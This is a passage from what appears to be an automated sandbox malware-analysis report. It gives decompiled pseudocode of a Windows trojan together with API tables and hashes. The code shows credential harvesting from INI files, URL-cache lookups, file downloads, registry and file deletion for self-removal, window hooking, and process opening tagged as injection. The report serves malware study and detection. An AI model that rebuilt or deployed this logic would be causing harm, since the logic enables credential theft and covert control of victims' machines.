				EnterCriticalSection(0x4228c0);
				_t99 = _a4;
				_t55 = E00406C86( *_t99);
				if(_t55 == 0xffffffff) {
					L33:
					LeaveCriticalSection(0x4228c0);
					return _v16;
				}
				_t58 = _t55 * 0x24 +  *0x4228d8;
				if( *((intOrPtr*)(_t58 + 0x10)) <= 0) {
					goto L33;
				}
				_t96 = _t58;
				if( *((intOrPtr*)(_t96 + 0x10)) != 1 || ( *( *(_t96 + 0xc)) & 0x00000003) == 0) {
					_t59 = _a16;
					__eflags = _t59;
					if(_t59 != 0) {
						 *_t59 =  *_t59 & 0x00000000;
						__eflags =  *_t59;
					}
					__eflags =  *((intOrPtr*)(_t96 + 0x18)) - 0xffffffff;
					if(__eflags != 0) {
						L22:
						_t60 =  *((intOrPtr*)(_t96 + 0x18));
						__eflags = _t60 - 0xffffffff;
						if(_t60 != 0xffffffff) {
							__eflags = _v16 - 0xffffffff;
							if(_v16 == 0xffffffff) {
								_t61 = _t60 -  *(_t96 + 0x1c);
								__eflags = _t61;
								_t103 = _t61;
								if(_t61 != 0) {
									__eflags = _a8;
									if(_a8 == 0) {
										_a12 = E0041772D(0x2000, 0x1000);
									}
									__eflags = _a12 - _t103;
									_t103 =  <  ? _a12 : _t103;
									__eflags = _a8;
									if(_a8 != 0) {
										E004163E4(_a8,  *((intOrPtr*)(_t96 + 0x14)) +  *(_t96 + 0x1c), _t103);
										_t50 = _t96 + 0x1c;
										 *_t50 =  *(_t96 + 0x1c) + _t103;
										__eflags =  *_t50;
									}
								}
								_t62 = _a16;
								__eflags = _t62;
								if(_t62 != 0) {
									 *_t62 = _t103;
								}
								_v16 = 1;
							}
						}
						goto L32;
					}
					LeaveCriticalSection(0x4228c0);
					_v5 = E00407308( &_v20, __eflags,  *_t99,  *((intOrPtr*)(_t96 + 4)),  &_v12);
					EnterCriticalSection(0x4228c0);
					__eflags = _v5;
					if(_v5 == 0) {
						L21:
						_t37 =  &_v16;
						 *_t37 = _v16 & 0x00000000;
						__eflags =  *_t37;
						SetLastError(0x2ee4);
						goto L22;
					}
					_t105 =  *_a4;
					_t71 = E00406C86( *_a4);
					__eflags = _t71 - 0xffffffff;
					if(_t71 == 0xffffffff) {
						E004163A8(_v12);
						goto L21;
					}
					_t96 = _t71 * 0x24 +  *0x4228d8;
					_t101 = E004184DE( &_v24, _t105);
					_t79 = E00414E0E( *((intOrPtr*)(_t96 + 0x10)),  *(_t96 + 0xc), _t75,  &_v12,  &_v20);
					__eflags = _t79;
					if(_t79 == 0) {
						L19:
						E004163A8(_t101);
						 *((intOrPtr*)(_t96 + 0x14)) = _v12;
						 *((intOrPtr*)(_t96 + 0x18)) = _v20;
						goto L22;
					}
					_t84 = E004165E8(_v24, 0, _t101);
					_a4 = _t84;
					__eflags = _t84;
					if(_t84 == 0) {
						goto L19;
					}
					_v28 = 0x1000;
					_t107 = E00416378(0x1000);
					__eflags = _t107;
					if(_t107 == 0) {
						L18:
						E004163A8(_a4);
						goto L19;
					}
					 *_t107 = 0x50;
					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E0041B55A(_t91, _v12, _v20);
							}
						}
					}
					E004163A8(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

0x00407427
0x00407432
0x00407438
0x0040743d
0x00407445
0x004075f0
0x004075f5
0x00407601
0x00407601
0x0040744e
0x00407458
0x00000000
0x00000000
0x0040745f
0x00407465
0x00407479
0x0040747c
0x0040747e
0x00407480
0x00407480
0x00407480
0x00407483
0x00407487
0x00407592
0x00407592
0x00407595
0x00407598
0x0040759a
0x0040759e
0x004075a0
0x004075a0
0x004075a3
0x004075a5
0x004075a7
0x004075ab
0x004075bc
0x004075bc
0x004075bf
0x004075c2
0x004075c6
0x004075ca
0x004075d7
0x004075dc
0x004075dc
0x004075dc
0x004075dc
0x004075ca
0x004075df
0x004075e2
0x004075e4
0x004075e6
0x004075e6
0x004075e8
0x004075e8
0x0040759e
0x00000000
0x00407598
0x00407495
0x004074af
0x004074b2
0x004074b8
0x004074bc
0x00407583
0x00407583
0x00407583
0x00407583
0x0040758c
0x00000000
0x0040758c
0x004074c5
0x004074c7
0x004074cc
0x004074cf
0x0040757e
0x00000000
0x0040757e
0x004074e2
0x004074ec
0x004074fa
0x004074ff
0x00407501
0x00407567
0x00407568
0x00407570
0x00407576
0x00000000
0x00407576
0x00407509
0x0040750e
0x00407511
0x00407513
0x00000000
0x00000000
0x0040751a
0x00407522
0x00407524
0x00407526
0x0040755f
0x00407562
0x00000000
0x00407562
0x00407530
0x00407536
0x0040753c
0x0040753e
0x00407540
0x00407543
0x00407545
0x00407547
0x0040754b
0x00407554
0x00407554
0x0040754b
0x00407545
0x0040755a
0x00000000
0x0040746f
0x00407472
0x004075ef
0x00000000
0x004075ef

APIs

EnterCriticalSection.KERNEL32(004228C0), ref: 00407432
LeaveCriticalSection.KERNEL32(004228C0), ref: 00407495
EnterCriticalSection.KERNEL32(004228C0), ref: 004074B2
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 00407536
SetLastError.KERNEL32(00002EE4), ref: 0040758C
LeaveCriticalSection.KERNEL32(004228C0), ref: 004075F5

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 4a13edeeb850a7961acd6c95301c3be1b7e6d07d653a927e79f071652090d879
Instruction ID: f634e7a2cd9eb5320d373ebb015850e5a319f3bfc28240e608c8b8cfa7937eae
Opcode Fuzzy Hash: 4a13edeeb850a7961acd6c95301c3be1b7e6d07d653a927e79f071652090d879
Instruction Fuzzy Hash: 04516071904209ABDF10AF65CC85ADE7BB4AF04354F04416AF824BB2D1D778ED85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040B012, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040B012(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E00416378(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E004163A8(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E00417258(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E00416378(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E0040FA33(_t48,  &_v112);
					_t50 = 0x66;
					E0040FA33(_t50,  &_v48);
					_t52 = 0x67;
					E0040FA33(_t52,  &_v32);
					_t54 = 0x68;
					E0040FA33(_t54,  &_v88);
					_t56 = 0x69;
					E0040FA33(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E00417294(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E0040AEA7(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E0040FA33(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E0041709B(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E0041679C(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E004163A8(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x0040b012
0x0040b023
0x0040b028
0x0040b02c
0x0040b031
0x0040b1b2
0x0040b1b2
0x0040b049
0x0040b04d
0x0040b1a8
0x00000000
0x0040b1a9
0x0040b053
0x0040b05f
0x00000000
0x00000000
0x0040b06f
0x0040b071
0x0040b076
0x00000000
0x0040b07c
0x0040b07c
0x0040b084
0x0040b087
0x0040b08d
0x0040b08e
0x0040b098
0x0040b099
0x0040b0a3
0x0040b0a4
0x0040b0ae
0x0040b0af
0x0040b0b9
0x0040b0ba
0x0040b0bf
0x0040b188
0x0040b18d
0x0040b192
0x0040b197
0x0040b0c1
0x0040b0c4
0x0040b0d5
0x0040b0e2
0x0040b0e6
0x0040b10b
0x0040b120
0x0040b129
0x0040b129
0x0040b13a
0x0040b148
0x0040b14e
0x0040b14f
0x0040b154
0x0040b157
0x0040b15e
0x0040b15f
0x0040b165
0x0040b16a
0x0040b16f
0x0040b174
0x0040b176
0x0040b183
0x0040b185
0x0040b185
0x0040b183
0x0040b174
0x0040b13a
0x0040b120
0x0040b0e6
0x00000000
0x0040b19d
0x0040b1a0
0x0040b1a5
0x00000000
0x0040b1a5
0x0040b197

APIs

GetPrivateProfileStringW.KERNEL32 ref: 0040B049

Part of subcall function 00416378: HeapAlloc.KERNEL32(00000008,-00000004,00417B46,00000000,?,?,?,0040E6CA,00000000,0040EBA4,?,?,00000000), ref: 00416389

StrStrIW.SHLWAPI(?,?), ref: 0040B0D1
StrStrIW.SHLWAPI(?,?), ref: 0040B0E2
GetPrivateProfileStringW.KERNEL32 ref: 0040B0FE
GetPrivateProfileStringW.KERNEL32 ref: 0040B11C
GetPrivateProfileStringW.KERNEL32 ref: 0040B136

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: 4155c42cfd0bdbc29c4bf0db0c02c532cedbcc59721b92ebdde21a812e68500f
Instruction ID: f5205f1fe6ec4e8460834a020c65dcf1444f25a8ddc89874f208227f25288c3b
Opcode Fuzzy Hash: 4155c42cfd0bdbc29c4bf0db0c02c532cedbcc59721b92ebdde21a812e68500f
Instruction Fuzzy Hash: 7C418F3290021ABADF10DBA5CC01AEFBB79EF44754F114076B914F7291D739AE068B98

Uniqueness

Uniqueness Score: -1.00%

Function 004098DC, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004098DC(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_t50 =  &_v1668;
				E0040F0DC(__ecx, _t50, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E0040F0DC(_t46, _t51, 2);
				PathRemoveFileSpecW(_t51);
				 *0x422b98 =  *0x422b98 | 0x00000002;
				_push(0);
				E00408E22();
				E0040FBCD(_t46, _t65);
				E0041BA18( &_v1680, _t65);
				E0041BA18(_t51, _t65);
				_t52 =  &_v2720;
				E0040F0DC(_t51, _t52, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E0040F9FD(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E004170DF( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00417E68(__ebx, 0x474,  &_v1168);
				}
				if( *0x423060 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x004098dc
0x004098dc
0x004098ec
0x004098f3
0x00409901
0x00409905
0x0040990c
0x00409914
0x00409916
0x0040991d
0x0040991f
0x00409924
0x00409930
0x00409937
0x0040993e
0x00409945
0x00409952
0x0040996e
0x0040997d
0x00409981
0x00409985
0x00409986
0x0040998f
0x00409997
0x0040999c
0x004099a4
0x004099be
0x004099c3
0x004099c3
0x004099cf
0x004099d3
0x004099d3
0x004099e0

APIs

Part of subcall function 0040F0DC: PathRenameExtensionW.SHLWAPI(?,.dat,?,00422BF8,00000000,00000032,?,77E49EB0,00000000), ref: 0040F155

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 00409901
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 00409914

Part of subcall function 00408E22: SetEvent.KERNEL32(00409924,00000000), ref: 00408E28
Part of subcall function 00408E22: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00408E3B

Part of subcall function 0040FBCD: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 0040FC0A
Part of subcall function 0040FBCD: Sleep.KERNEL32(000001F4), ref: 0040FC19
Part of subcall function 0040FBCD: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0040FC2F

Part of subcall function 0041BA18: FindFirstFileW.KERNEL32(?,?,?,?,?,750D46D0), ref: 0041BA49
Part of subcall function 0041BA18: FindNextFileW.KERNEL32(00000000,?), ref: 0041BAA4
Part of subcall function 0041BA18: FindClose.KERNEL32(00000000), ref: 0041BAAF
Part of subcall function 0041BA18: SetFileAttributesW.KERNEL32(?,00000080,?,?,?,750D46D0), ref: 0041BABB
Part of subcall function 0041BA18: RemoveDirectoryW.KERNEL32(?), ref: 0041BAC2

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 00409952
CharToOemW.USER32 ref: 0040996E
CharToOemW.USER32 ref: 0040997D
ExitProcess.KERNEL32 ref: 004099D3

Part of subcall function 00417E68: CharToOemW.USER32 ref: 00417E98
Part of subcall function 00417E68: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00417F1C

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: a66739d422e66c3b43576e997377683fcc932ab4a42c9d7a0a85915b2ba2f5b7
Instruction ID: 52cf3ec1648781b87182aa8342fda6cffcc4596da0b71f98ca6b7022099ce99f
Opcode Fuzzy Hash: a66739d422e66c3b43576e997377683fcc932ab4a42c9d7a0a85915b2ba2f5b7
Instruction Fuzzy Hash: A221A472908344ABD230A765DC06FDB77ACDB84310F00493FB558E7191DB74A905CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 004181EA, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004181EA(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
				_t41 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
				if(_t41 == 0xffffffff) {
					L15:
					return _v5;
				}
				_t28 = E00416378(0x1000);
				_v20 = _t28;
				if(_t28 == 0) {
					L13:
					CloseHandle(_t41);
					if(_v5 == 0) {
						E0041B705(_a8);
					}
					goto L15;
				}
				_v16 = 0;
				while(_a16 == 0 || WaitForSingleObject(_a16, 0) == 0x102) {
					if(InternetReadFile(_a4, _v20, 0x1000,  &_v12) == 0) {
						break;
					}
					if(_v12 == 0) {
						FlushFileBuffers(_t41);
						_v5 = 1;
						break;
					}
					if(WriteFile(_t41, _v20, _v12,  &_v24, 0) == 0) {
						break;
					}
					_t37 = _v12;
					if(_t37 != _v24) {
						break;
					}
					_v16 = _v16 + _t37;
					if(_v16 <= _a12) {
						continue;
					}
					break;
				}
				E004163A8(_v20);
				goto L13;
			}

0x00418207
0x00418210
0x00418215
0x004182b5
0x004182bb
0x004182bb
0x00418220
0x00418225
0x0041822a
0x004182a1
0x004182a2
0x004182ab
0x004182b0
0x004182b0
0x00000000
0x004182ab
0x0041822c
0x0041822f
0x0041825c
0x00000000
0x00000000
0x00418261
0x0041828f
0x00418295
0x00000000
0x00418295
0x00418277
0x00000000
0x00000000
0x00418279
0x0041827f
0x00000000
0x00000000
0x00418281
0x0041828a
0x00000000
0x00000000
0x00000000
0x0041828c
0x0041829c
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,?,?,?,00000000), ref: 0041820A
WaitForSingleObject.KERNEL32(?,00000000), ref: 00418238
InternetReadFile.WININET(00001000,?,00001000,?), ref: 00418254
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041826F
FlushFileBuffers.KERNEL32(00000000), ref: 0041828F
CloseHandle.KERNEL32(00000000), ref: 004182A2

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$BuffersCloseCreateFlushHandleInternetObjectReadSingleWaitWrite
String ID:
API String ID: 3509176705-0
Opcode ID: 1d859016c156619dcc006059b782e96420a6f5938149c65f7e22e0346d71c55f
Instruction ID: b256aa5f8ead9610beaa90fe01409c858e001b3624338cb16b82c082080b139c
Opcode Fuzzy Hash: 1d859016c156619dcc006059b782e96420a6f5938149c65f7e22e0346d71c55f
Instruction Fuzzy Hash: 8521AF70A00209BFDF129FA0DD84BEE7B79EB04311F1444AAFA11B51A0DB398D849B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041AADD, Relevance: 9.1, APIs: 6, Instructions: 72
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041AADD(int __ecx, intOrPtr* __edx, struct tagPOINT _a4, signed int _a8) {
				intOrPtr* _v8;
				long _v12;
				struct HWND__* _v16;
				int _v20;
				struct HWND__* _v24;
				long _t24;
				struct HWND__* _t33;
				intOrPtr* _t44;

				_push(_a8);
				_t44 = __edx;
				_v8 = __edx;
				_v20 = __ecx;
				_t33 = WindowFromPoint(_a4.x);
				if(_t33 != 0) {
					if(SendMessageTimeoutW(_t33, 0x84, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4.x & 0x0000ffff, 2, _v20,  &_v12) != 0) {
						_t24 = _v12;
						if(_t24 != 0xffffffff) {
							if(_t44 != 0) {
								 *_t44 = _t24;
							}
						} else {
							_v16 = _t33;
							SetWindowLongW(_t33, 0xfffffff0, GetWindowLongW(_t33, 0xfffffff0) | 0x08000000);
							_t33 = E0041AADD(_v20, _v8, _a4, _a8);
							SetWindowLongW(_v24, 0xfffffff0, GetWindowLongW(_v24, 0xfffffff0) & 0xf7ffffff);
						}
					} else {
						_t33 = 0;
					}
				}
				return _t33;
			}

0x0041aae9
0x0041aaec
0x0041aaf1
0x0041aaf5
0x0041aaff
0x0041ab03
0x0041ab32
0x0041ab38
0x0041ab3f
0x0041ab90
0x0041ab92
0x0041ab92
0x0041ab41
0x0041ab4a
0x0041ab5f
0x0041ab7a
0x0041ab8a
0x0041ab8a
0x0041ab34
0x0041ab34
0x0041ab34
0x0041ab32
0x0041ab9c

APIs

WindowFromPoint.USER32(?,?,00000000,?,?,?,00000000), ref: 0041AAF9
SendMessageTimeoutW.USER32 ref: 0041AB2A
GetWindowLongW.USER32(00000000,000000F0), ref: 0041AB4E
SetWindowLongW.USER32 ref: 0041AB5F
GetWindowLongW.USER32(?,000000F0), ref: 0041AB7C
SetWindowLongW.USER32 ref: 0041AB8A

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: Window$Long$FromMessagePointSendTimeout
String ID:
API String ID: 2645164282-0
Opcode ID: 1d2f1b38cf60882bcc0eac4107d89fa1ff9b6facabf1ff5521594151291d6e59
Instruction ID: c72529a55b52859089bac894324b1e45911e0e2ae35aa08dbfe42b91fdee69fc
Opcode Fuzzy Hash: 1d2f1b38cf60882bcc0eac4107d89fa1ff9b6facabf1ff5521594151291d6e59
Instruction Fuzzy Hash: 6421D571508355ABDB10DF64CC40EAB7B99EB84370F20472AFDA0922E2D678E954CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0041B5BF, Relevance: 9.1, APIs: 6, Instructions: 68
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0041B5BF(signed int __eax, void* __ecx, void** __esi, long _a4) {
				intOrPtr _v8;
				long _v12;
				void* _t19;
				void* _t20;
				long _t22;
				void* _t23;

				_t33 = __esi;
				asm("sbb eax, eax");
				_t19 = CreateFileW(_a4, 0x80000000,  ~(__eax & 2) & 0x00000006 | 0x00000001, 0, 3, 0, 0);
				__esi[2] = _t19;
				if(_t19 == 0xffffffff) {
					L11:
					_t20 = 0;
				} else {
					__imp__GetFileSizeEx(_t19,  &_v12);
					if(_t19 == 0 || _v8 != 0) {
						L10:
						CloseHandle(_t33[2]);
						goto L11;
					} else {
						_t22 = _v12;
						__esi[1] = _t22;
						if(_t22 != 0) {
							_t23 = VirtualAlloc(0, _t22, 0x3000, 4);
							 *__esi = _t23;
							if(_t23 == 0) {
								goto L10;
							} else {
								if(ReadFile(__esi[2], _t23, __esi[1],  &_a4, 0) == 0 || _a4 != __esi[1]) {
									VirtualFree( *_t33, 0, 0x8000);
									goto L10;
								} else {
									goto L5;
								}
							}
						} else {
							 *__esi = 0;
							L5:
							_t20 = 1;
						}
					}
				}
				return _t20;
			}

0x0041b5bf
0x0041b5d2
0x0041b5e4
0x0041b5ea
0x0041b5f0
0x0041b660
0x0041b660
0x0041b5f2
0x0041b5f7
0x0041b5ff
0x0041b657
0x0041b65a
0x00000000
0x0041b606
0x0041b606
0x0041b609
0x0041b60e
0x0041b61f
0x0041b625
0x0041b629
0x00000000
0x0041b62b
0x0041b63f
0x0041b651
0x00000000
0x00000000
0x00000000
0x00000000
0x0041b63f
0x0041b610
0x0041b610
0x0041b612
0x0041b612
0x0041b612
0x0041b60e
0x0041b5ff
0x0041b664

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5E4
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B5F7
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B61F
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B637
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B651
CloseHandle.KERNEL32(?,?,?,?,?,0040F5E1,?,?,00000000), ref: 0041B65A

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 1974014688-0
Opcode ID: f569c9eb8a952e84e56e737c839da9d948d02843f5272fe091707570e06a9856
Instruction ID: 3417aaef229067658624a6b052d9febd99a0542ca82a5b406a3ed3d9ed21ecc7
Opcode Fuzzy Hash: f569c9eb8a952e84e56e737c839da9d948d02843f5272fe091707570e06a9856
Instruction Fuzzy Hash: ED11B271100600BFDB214F61CD49EBB7BB8EBA4700F10892EF592D66B0E735A980DB28

Uniqueness

Uniqueness Score: -1.00%

Function 0041D15A, Relevance: 9.1, APIs: 6, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0041D15A(struct HWND__* _a4, struct HRGN__* _a8, int _a12) {
				void* _t21;
				int _t22;
				signed int _t23;
				struct HWND__* _t27;
				char* _t31;

				_t27 = _a4;
				if(( *0x422b98 & 0x00000004) == 0 || E0040EEE1() == 0) {
					L7:
					return GetUpdateRgn(_t27, _a8, _a12);
				} else {
					_t31 = TlsGetValue( *0x4228e4);
					if(_t31 == 0 || _t27 !=  *((intOrPtr*)(_t31 + 4))) {
						goto L7;
					} else {
						SetRectRgn(_a8,  *(_t31 + 0xc),  *(_t31 + 0x10),  *(_t31 + 0x14),  *(_t31 + 0x18));
						if(_a12 != 0) {
							_t22 = SaveDC( *(_t31 + 8));
							_t23 = SendMessageW(_t27, 0x14,  *(_t31 + 8), 0);
							asm("sbb eax, eax");
							 *((intOrPtr*)(_t31 + 0x1c)) =  ~_t23 + 1;
							RestoreDC( *(_t31 + 8), _t22);
						}
						 *_t31 = 1;
						_t21 = 2;
						return _t21;
					}
				}
			}

0x0041d165
0x0041d169
0x0041d1db
0x00000000
0x0041d174
0x0041d180
0x0041d184
0x00000000
0x0041d18b
0x0041d19a
0x0041d1a4
0x0041d1aa
0x0041d1ba
0x0041d1c2
0x0041d1c9
0x0041d1cc
0x0041d1d2
0x0041d1d5
0x0041d1d8
0x00000000
0x0041d1d8
0x0041d184

APIs

GetUpdateRgn.USER32 ref: 0041D1E2

Part of subcall function 0040EEE1: WaitForSingleObject.KERNEL32(00000000,004162FC,00000318,00000000,00000318,909011A5,00000002), ref: 0040EEE9

TlsGetValue.KERNEL32 ref: 0041D17A
SetRectRgn.GDI32(?,?,?,?,?), ref: 0041D19A
SaveDC.GDI32(?), ref: 0041D1AA
SendMessageW.USER32(?,00000014,?,00000000), ref: 0041D1BA
RestoreDC.GDI32(?,00000000), ref: 0041D1CC

Memory Dump Source

Source File: 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.197081546.0000000000400000.00000040.00000001.sdmp Download File
Associated: 00000002.00000002.197105121.0000000000422000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.197108232.0000000000425000.00000002.00000001.sdmp Download File

Similarity

API ID: MessageObjectRectRestoreSaveSendSingleUpdateValueWait
String ID:
API String ID: 3142230470-0
Opcode ID: 277d0a3bb1c0b5a8ba2a5a36c9c650d4c3ad2a805e93b05a1217f5295ca162de
Instruction ID: 4477886e3693d709ad831b2e702d9f70507c2f4a7814e474dc9affc410d63054
Opcode Fuzzy Hash: 277d0a3bb1c0b5a8ba2a5a36c9c650d4c3ad2a805e93b05a1217f5295ca162de
Instruction Fuzzy Hash: BF119A71400741BFCB325F60EE48E96BFB5FB09710F00492AFA97A1671C376A490DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00415A2B, Relevance: 9.1, APIs: 6, Instructions: 54
synchronizationthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00415A2B(void* __ecx, long _a4, intOrPtr _a8) {
				char _v5;
				void* __edi;
				void* __esi;
				void* _t10;
				void* _t14;
				void* _t23;
				void* _t25;
				void* _t26;

				_t21 = __ecx;
				_push(__ecx);
				_v5 = 0;
				_t23 = OpenProcess(0x47a, 0, _a4);
				_t28 = _t23;
				if(_t23 != 0) {
					_push(_t25);
					_t10 = E0040EDF6(_t21, _t23, _t25, _t28, _a8, 0);
					_t26 = _t10;
